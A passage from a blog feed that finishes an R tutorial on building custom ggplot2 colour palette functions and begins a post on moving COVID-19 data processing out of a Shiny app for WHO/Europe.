&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;structure&lt;/span&gt;(out, name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; name, class &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;palette&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If a user doesn’t input the number of colours, be default we use all of
the colours in the palette. For a discrete palette, we simply use the
vector of colours from &lt;code&gt;cvi_colours&lt;/code&gt; as our colour palette. However, for
continuous colour palettes, we need to use the &lt;code&gt;colorRampPalette()&lt;/code&gt;
function from {grDevices} to interpolate the given colours onto a
spectrum. The &lt;code&gt;switch()&lt;/code&gt; function then changes the output based on the
chosen type of palette.&lt;/p&gt;
&lt;p&gt;We don’t just want to simply return a vector of colours from the
&lt;code&gt;cvi_palettes()&lt;/code&gt; function, we want to add additional attributes using
the &lt;code&gt;structure()&lt;/code&gt; function. The first additional attribute is the name,
which we match to the name we gave the palette in &lt;code&gt;cvi_colours&lt;/code&gt;. The
second additional attribute is a &lt;code&gt;class&lt;/code&gt; which here we’ll call
&lt;code&gt;palette&lt;/code&gt;. By assigning a class to the colour palette, this means we can
use S3 methods. S3 methods in R are a way of writing functions that do
different things for objects of different classes. S3 methods aren’t
really the topic of this post, but this &lt;a href="https://njtierney.github.io/r/missing%20data/rbloggers/2016/11/06/simple-s3-methods/" rel="external"&gt;blog
post&lt;/a&gt;
has a nice overview of them.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;cvi_palettes&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;my_favourite_colours&amp;#34;&lt;/span&gt;, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;discrete&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/custom-colour-palettes-for-ggplot2/favourite-palette-1.svg" title="Colour palette showing three vertical strips in pink, green, and blue with the word my favourite colours in the centre" alt="Colour palette showing three vertical strips in pink, green, and blue with the word my favourite colours in the centre" width="50%" style="display: block; margin: auto;" /&gt;
&lt;h3 id="creating-ggplot2-functions"&gt;Creating {ggplot2} functions&lt;/h3&gt;
&lt;p&gt;We need to define some functions so that {ggplot2} understands what to
do with our colour palettes. We’ll start by defining a simple {ggplot2}
plot that we’ll use to demonstrate our colour palettes later on.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;A&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;B&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;C&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; mapping &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; x, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; y)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.05&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.95&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.justification &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;())
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Within {ggplot2}, there are two main ways to control the look of your
plot: (i) using &lt;code&gt;scale_*()&lt;/code&gt; functions to control the aesthetics that
have been mapped to your data; or (ii) using themes. Themes control the
aspects of your plot which do not depend on your data e.g. the
background colour. In this blog post, we’ll focus on the &lt;code&gt;scale_*()&lt;/code&gt;
functions.&lt;/p&gt;
&lt;p&gt;There are two aesthetics in {ggplot2} that involve colour: (i) &lt;code&gt;colour&lt;/code&gt;,
which changes the outline colour of a geom; and (ii) &lt;code&gt;fill&lt;/code&gt;, which
changes the inner colour of a geom. Note that not all geoms have both
&lt;code&gt;fill&lt;/code&gt; and &lt;code&gt;colour&lt;/code&gt; options e.g. &lt;code&gt;geom_line()&lt;/code&gt; is only affected by the
&lt;code&gt;colour&lt;/code&gt; aesthetic.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; x), colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggtitle&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Fill&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; x), fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;white&amp;#34;&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggtitle&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Colour&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/custom-colour-palettes-for-ggplot2/fill-colour-plot-1.svg" title="Two bars charts side by side. On the left the bars are coloured in pink, green, and blue. On the right, the outline is coloured in pink, green, and blue" alt="Two bars charts side by side. On the left the bars are coloured in pink, green, and blue. On the right, the outline is coloured in pink, green, and blue" width="50%" style="display: block; margin: auto;" /&gt;
&lt;p&gt;For each aesthetic, colour and fill, the function needs to be able to
handle both discrete and continuous colour palettes. We need to make two
functions: one to handle a discrete variable, and one for continuous
variables. We’ll start by dealing with discrete variables. Here, we pass
our palette colours generated by &lt;code&gt;cvi_palettes()&lt;/code&gt; as the &lt;code&gt;values&lt;/code&gt;
argument in the &lt;code&gt;scale_colour_manual()&lt;/code&gt; function from {ggplot2}:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scale_colour_cvi_d &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(name) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ggplot2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_manual&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;cvi_palettes&lt;/span&gt;(name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;discrete&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The function to use our colour palettes to change the fill colour is
almost identical, we simply change the function name, and use
&lt;code&gt;scale_fill_manual()&lt;/code&gt; instead of &lt;code&gt;scale_colour_manual()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scale_fill_cvi_d &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(name) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ggplot2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_fill_manual&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;cvi_palettes&lt;/span&gt;(name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;discrete&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now for continuous variables. Continuous scales are similar but we use
the &lt;code&gt;scale_colour_gradientn()&lt;/code&gt; function instead of the manual scale
functions. This creates an n-colour gradient scale. We set the colours
used in the gradient scale using the &lt;code&gt;cvi_palettes()&lt;/code&gt; function we
defined earlier, and set the type as &lt;code&gt;continuous&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scale_colour_cvi_c &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(name) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ggplot2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_gradientn&lt;/span&gt;(colours &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;cvi_palettes&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;continuous&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;scale_colour_gradientn()&lt;/code&gt; function already has the aesthetic
argument set as &lt;code&gt;colour&lt;/code&gt; by default, so we don’t need to worry about
changing that. Again, the fill version of the function is analogous:
change the name of the function, and use &lt;code&gt;scale_fill_gradientn()&lt;/code&gt;
instead of &lt;code&gt;scale_colour_gradientn()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scale_fill_cvi_c &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(name) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ggplot2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_fill_gradientn&lt;/span&gt;(colours &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;cvi_palettes&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;continuous&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To ensure that the &lt;code&gt;scale_colour_*()&lt;/code&gt; functions work with either the
British or American spelling of colour, we can simply set one equal to
the other:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scale_color_cvi_d &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; scale_colour_cvi_d
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scale_color_cvi_c &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; scale_colour_cvi_c
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="testing-our-colour-palettes"&gt;Testing our colour palettes&lt;/h2&gt;
&lt;p&gt;Now that we have all the functions we need, we can call them in the same
way we would with any &lt;code&gt;scale_*()&lt;/code&gt; function in {ggplot2}:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; y), size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_cvi_c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;cvi_purples&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; x), size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_fill_cvi_d&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;my_favourite_colours&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/custom-colour-palettes-for-ggplot2/test-palette-plot-1.svg" title="Two charts side by side. On the left the points are coloured in gradients of purple. On the right, the bars in the bar chart are coloured in pink, green, and blue." alt="Two charts side by side. On the left the points are coloured in gradients of purple. On the right, the bars in the bar chart are coloured in pink, green, and blue." width="50%" style="display: block; margin: auto;" /&gt;
&lt;h2 id="extending-the-functionality-of-your-colour-palettes"&gt;Extending the functionality of your colour palettes&lt;/h2&gt;
&lt;p&gt;The colour palette functions we’ve defined here are fairly basic, and we
may want to add some additional functionality to them.&lt;/p&gt;
&lt;h3 id="printing-colour-palettes"&gt;Printing colour palettes&lt;/h3&gt;
&lt;p&gt;Users will often want to view the colours in a palette on their screen
&lt;em&gt;before&lt;/em&gt; they go the effort of implementing it. Although this
technically isn’t necessary to make your colour palette work, it’s
extremely useful to anyone using it. Earlier, we defined the &lt;code&gt;palette&lt;/code&gt;
class, so we could create a function &lt;code&gt;print.palette()&lt;/code&gt; which
automatically prints a plot of any object with the class &lt;code&gt;palette&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id="turn-your-colour-palettes-into-an-r-package"&gt;Turn your colour palettes into an R package&lt;/h3&gt;
&lt;p&gt;If you have a collection of functions that work together and you need to
use them in multiple projects, it’s best (at least in the long run) to
turn them into an R package. All of the colour palettes I’ve used in my
work have been part of an R package. Making your palette functions into
a package also makes it easier to share them with other people (super
helpful if the colour palettes are for work).&lt;/p&gt;
&lt;p&gt;If you’ve never made an R package before, check out our previous blog
post on &lt;a href="https://www.jumpingrivers.com/blog/personal-r-package/" rel="external"&gt;Writing a Personal R
Package&lt;/a&gt; to help
you get started.&lt;/p&gt;
&lt;h3 id="discrete-vs-continuous-palettes"&gt;Discrete vs continuous palettes&lt;/h3&gt;
&lt;p&gt;Some of the colour palettes you define might work better for continuous
variables, and some may work better for discrete variables. At the
moment, any colour palette can be used for either discrete or continuous
variables at the user’s discretion. You may want to restrict which
palettes are used with which type of palette, or at least provide a
warning message to a user.&lt;/p&gt;
&lt;p&gt;For example using the &lt;code&gt;my_favourite_colours&lt;/code&gt; palette doesn’t look very
nice when we interpolate the colours for a continuous palette.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;cvi_palettes&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;my_favourite_colours&amp;#34;&lt;/span&gt;, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;continuous&amp;#34;&lt;/span&gt;, n &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;20&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/custom-colour-palettes-for-ggplot2/palette-gradient-1.svg" title="Colour palette showing three vertical strips of pink, green, and blue blended together in a gradient with the word my favourite colours in the centre" alt="Colour palette showing three vertical strips of pink, green, and blue blended together in a gradient with the word my favourite colours in the centre" width="50%" style="display: block; margin: auto;" /&gt;
&lt;h3 id="order-the-colours"&gt;Order the colours&lt;/h3&gt;
&lt;p&gt;By default colours are returned in the order you define them in the
list. For continuous colour palettes this works quite well, as it
ensures colours go from light to dark, or vice versa. However, for
discrete palettes we may want to rearrange the colours to ensure greater
contrast between colours displayed next to each other. The
&lt;code&gt;cvi_palettes()&lt;/code&gt; function could be edited to return colours in a
different order if a discrete palette is chosen.&lt;/p&gt;
&lt;p&gt;Similarly, many colour palettes include a &lt;code&gt;&amp;quot;direction&amp;quot;&lt;/code&gt; argument which
reverses the order in which the colours in the palette are used
e.g. going from light to dark instead of dark to light.&lt;/p&gt;
&lt;h3 id="checking-for-colourblind-palettes"&gt;Checking for colourblind palettes&lt;/h3&gt;
&lt;p&gt;It’s a good idea to check if your colour palettes are colourblind
friendly, especially for discrete palettes. Sequential colour palettes
usually have a better chance of being colourblind friendly. &lt;a href="https://davidmathlogic.com/colorblind/#%23D81B60-%231E88E5-%23FFC107-%23004D40" rel="external"&gt;David
Nichols&lt;/a&gt;
provides a tool for seeing what your palettes may look like to people
who are colourblind. If you choose to include colour palettes that are
not colourblind friendly, it may be useful to include a warning for
users.&lt;/p&gt;
&lt;h2 id="final-thoughts"&gt;Final thoughts&lt;/h2&gt;
&lt;p&gt;By now, you should have the tools to create your own simple colour
palette functions for using with {ggplot2}. Most of the functions
described are based on those used in the
&lt;a href="https://github.com/BlakeRMills/MetBrewer" rel="external"&gt;{MetBrewer}&lt;/a&gt; and
&lt;a href="https://github.com/karthik/wesanderson" rel="external"&gt;{wesanderson}&lt;/a&gt; colour palettes.
If you want to see examples of some of these extensions implemented in a
larger colour palette package, check out the source code for those
packages on GitHub.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/custom-colour-palettes-for-ggplot2/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Offload Shiny's Workload: COVID-19 processing for the WHO/Europe</title><link>https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/</link><pubDate>Tue, 21 Jun 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;At Jumping Rivers, we have a wealth of experience developing and
maintaining &lt;a href="https://shiny.rstudio.com/" rel="external"&gt;Shiny&lt;/a&gt; applications. Over the
past year, we have been maintaining a Shiny
&lt;a href="https://worldhealthorg.shinyapps.io/EURO_COVID-19_vaccine_monitor/" rel="external"&gt;application&lt;/a&gt;
for the World Health Organization Europe (WHO/Europe) that presents data
about COVID-19 vaccination uptake across Europe.&lt;/p&gt;
&lt;p&gt;The great strength of Shiny is that it simplifies the production of
data-focused web applications, making it relatively easy to present data
to users / clients in an interactive way. However data can be big and
data-processing can be complex, time-consuming and memory-hungry. So if
you bake an entire data pipeline into a Shiny application, you may end
up with an application that is costly to host and doesn’t provide the
best user experience (slow, frequently crashes).&lt;/p&gt;
&lt;p&gt;One of the best tips for ensuring your application runs smoothly is
simple:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Do as little as possible.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That is … make sure &lt;em&gt;your application&lt;/em&gt; does as little as possible.&lt;/p&gt;
&lt;p&gt;The data upon which the application is based comes from several sources,
across multiple countries, is frequently updated, and is constantly
evolving. When we joined this project, the integration of these datasets
was performed by the application itself. This meant that when a user
opened the app, multiple large datasets were downloaded, cleaned up, and
combined together—a process that might take several minutes—before the
user could see the first table.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-who-shiny-covid-maintenance-continuous-integration"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="do-as-little-processing-as-possible"&gt;Do as little processing as possible&lt;/h2&gt;
&lt;p&gt;A simple data-driven app may look as follows: It downloads some data,
processes that data and then presents a subset of the raw and processed
data to the user.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/graphics/d1_simple_app.svg" title="Data is downloaded, processed, then presented by the app in both forms" alt="Data is downloaded, processed, then presented by the app in both forms" width="300px" height="350px" /&gt;
&lt;p&gt;The initial data processing steps may make the app very slow, and if it
is really sluggish, may mean that users close the app before it fully
loads.&lt;/p&gt;
&lt;p&gt;Since the data processing pipeline is encoded in the app, a simple way
to improve speed is for the app to cache any processed data. With the
cached, processed data in place, for most users the app would only need
to download or import the raw and the processed data—alleviating the
need for any data processing while the app is running. But, suppose the
